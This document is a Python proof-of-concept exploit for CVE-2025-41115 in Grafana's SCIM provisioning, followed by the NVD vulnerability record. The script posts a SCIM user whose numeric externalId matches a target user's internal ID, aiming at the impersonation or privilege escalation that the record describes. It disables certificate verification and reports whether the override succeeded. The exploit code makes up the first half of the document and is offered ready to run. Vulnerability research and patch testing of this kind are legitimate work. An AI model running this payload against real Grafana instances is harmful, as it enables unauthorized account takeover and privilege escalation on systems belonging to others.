CVE-2025-41115

# CVE-2025-41115 PoC - Grafana SCIM User ID Override import requests import json import sys # Configuration GRAFANA_URL = "https://your-grafana-instance.com" SCIM_TOKEN = "your-scim-bearer-token" TARGET_USER_INTERNAL_ID = 123 # Target user's internal numeric ID def create_malicious_user(): """Create a user with malicious externalId to override internal user ID""" headers = { "Authorization": f"Bearer {SCIM_TOKEN}", "Content-Type": "application/scim+json" } # Malicious SCIM user creation with internal ID as externalId payload = { "schemas": ["urn:ietf:params:scim:schemas:core:2.0:User"], "userName": "[email protected]", "name": { "givenName": "Attacker", "familyName": "User" }, "emails": [{ "value": "[email protected]", "primary": True }], "externalId": str(TARGET_USER_INTERNAL_ID), "active": True } try: response = requests.post( f"{GRAFANA_URL}/api/scim/v2/Users", headers=headers, json=payload, verify=False, timeout=30 ) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {json.dumps(response.json(), indent=2)}") if response.status_code in [200, 201]: print("[+] User created successfully - internal ID override possible!") return True else: print("[-] Failed to create user") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": print("[*] CVE-2025-41115 PoC - Grafana SCIM User ID Override") print("[*] Target: Grafana Enterprise/Cloud 12.x with SCIM enabled") create_malicious_user()

{"cve": {"id": "CVE-2025-41115", "sourceIdentifier": "[email protected]", "published": "2025-11-21T15:15:52.283", "lastModified": "2026-01-08T16:39:45.290", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SCIM provisioning was introduced in Grafana Enterprise and Grafana Cloud in April to improve how organizations manage users and teams in Grafana by introducing automated user lifecycle management.\n\nIn Grafana versions 12.x where SCIM provisioning is enabled and configured, a vulnerability in user identity handling allows a malicious or compromised SCIM client to provision a user with a numeric externalId, which in turn could allow to override internal user IDs and lead to impersonation or privilege escalation.\n\nThis vulnerability applies only if all of the following conditions are met:\n- `enableSCIM` feature flag set to true\n- `user_sync_enabled` config option in the `[auth.scim]` block set to true"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:grafana:grafana:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "12.0.0", "versionEndExcluding": "12.2.1", "matchCriteriaId": "FB8C7E22-7509-4CF8-AEFF-9F5AE2F04B93"}]}]}], "references": [{"url": "https://grafana.com/security/security-advisories/CVE-2025-41115", "source": "[email protected]", "tags": ["Broken Link"]}]}}